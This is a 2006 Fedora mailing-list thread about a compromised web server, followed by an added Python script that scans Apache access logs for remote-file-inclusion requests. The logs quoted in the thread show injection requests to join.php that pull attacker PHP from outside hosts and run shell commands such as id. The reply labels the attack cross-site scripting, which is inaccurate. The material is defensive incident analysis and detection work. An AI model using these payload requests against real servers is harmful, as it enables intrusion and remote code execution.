Re: Postfix hit again (Spam)



On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:
>
> > On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA1
> > >
> > > On Tue, 23 May 2006 00:14:32 +0000
> > > replies-lists-redhat@xxxxxxxxxxxxxxxxxxxxx wrote:
> > > > i haven't been following this topic in great detail, but i suspect that
> > > > you have a form on your site that is being exploited for "form spam".
> > > > if you're not familiar with this, search google for "form spam".
> > > >
> > > > - Rick
> > >
> > > Rick,
> > > Thank you. No, I have not heard of this.
> >
> > I don't think that's what this is. Form spam takes advantage of
> > poorly-coded mail/contact forms and uses them to send mail to recipients
> > other than those intended by the form designer.
> >
> > What's happening here is that the spammer is running their own code
> > (downloaded into /tmp) to send the mail, a rather more serious
> > situation.
> >
> > Paul.
>
> I might not know too much, but I really think they are using my forms. I found
> quite a few log entries. Here are a few.
>
> 81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
>
> AOL:
> 172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374
> 172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412
> 172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
>
> And the xpl.netmisphere2.com site has hacking information:
> http://xpl.netmisphere2.com/ I think this outta be illegal!!

Looks like an exploit of a cross-site scripting vulnerability in your
join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP
script that gets injected into your form; it's not an image at all.

You need to turn off that form until you can get a fixed version of that
application. And of course reinstall that system.

Paul.

--
fedora-list mailing list
fedora-list@xxxxxxxxxx
To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list
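The log lines CodeHeads posted show the same shape every time: a request to join.php whose CONFIG[path] parameter is a URL to code on another host, in three cases paired with a cmd= parameter carrying a shell command. That shape is what is commonly called remote file inclusion (RFI), and it is easy to spot in an access log once you decode the query string. The script below is an added example for this thread, not code from any of the posts or from the topsites application: it parses Apache access-log lines, URL-decodes the parameters, and flags (a) parameters that carry a remote URL and (b) command parameters, then collects the payload hosts and the attacker's commands for the incident record. The sample log is constructed from the lines in the thread plus one benign line; the set of parameter names treated as command carriers, and the assumption that FORM[url] is a field that legitimately takes a site URL (so a URL there alone is not flagged), are my assumptions and should be adjusted to the application being protected.

```python
"""Scan Apache access-log lines for remote-file-inclusion (RFI) style
requests: a query parameter whose value is a URL on another host, often
paired with a "cmd" parameter carrying a shell command for the included
script to run.

Added example for this thread, not code from any of the posts or from the
application under discussion.  SAMPLE_LOG is constructed: the benign first
line is invented, the rest are modelled on the entries CodeHeads posted.
CMD_PARAMS and URL_PARAMS_OK are assumptions, not facts from the thread.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# client, identd, user, [timestamp], "METHOD target HTTP/x.y", status, bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)
REMOTE_SCHEMES = ("http", "https", "ftp")
CMD_PARAMS = {"cmd", "c", "exec", "command"}  # assumed names; extend per application
URL_PARAMS_OK = {"FORM[url]"}  # assumed: a topsites "join" form legitimately takes a site URL

SAMPLE_LOG = """\
10.0.0.5 - - [21/May/2006:07:50:00 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=http://example.org/ HTTP/1.1" 200 5100
81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
"""


def _remote_host(value):
    """Hostname if value is a URL on a remote host, else None."""
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme.lower() in REMOTE_SCHEMES and parts.hostname:
        return parts.hostname
    return None


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # urlsplit cuts at the first '?'; a second '?' (as in "CMD.gif?&cmd=id") stays in the query
    target = urlsplit(rec["target"])
    rec["path"] = target.path
    # parse_qsl decodes %5b -> '[' and %20 -> ' '; keep_blank_values keeps empty pieces
    rec["params"] = parse_qsl(target.query, keep_blank_values=True)
    return rec


def findings_for(rec):
    """List of (kind, param, detail) indicators for one parsed request."""
    out = []
    for name, value in rec["params"]:
        host = _remote_host(value)
        if host and name not in URL_PARAMS_OK:
            out.append(("remote_include", name, host))
        if name.lower() in CMD_PARAMS and value:
            out.append(("command", name, value))
    return out


def scan(log_text):
    """Return [(client, path, findings)] for every request with at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        f = findings_for(rec)
        if f:
            hits.append((rec["client"], rec["path"], f))
    return hits


def payload_hosts(hits):
    """Distinct hosts the attacker pulled code from (block, and fetch the payload from an isolated box)."""
    return sorted({d for _, _, f in hits for k, _, d in f if k == "remote_include"})


def attacker_commands(hits):
    """Commands the attacker asked the included script to run, in log order."""
    return [d for _, _, f in hits for k, _, d in f if k == "command"]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for client, path, f in hits:
        print(client, path, f)
    print("payload hosts:", payload_hosts(hits))
    print("commands:", attacker_commands(hits))
```

Run it against the real access log (`scan(open("/var/log/httpd/access_log").read())`) to see every host the attacker fetched code from and every command they ran; the first flagged entry shows why the URL-bearing parameter alone is enough to flag, since the xzblog.txt request carries no cmd= at all. The benign first line is not flagged because FORM[url] is allowed to carry a URL; drop that allowlist entry and it would be, which is the false-positive trade-off to tune per application.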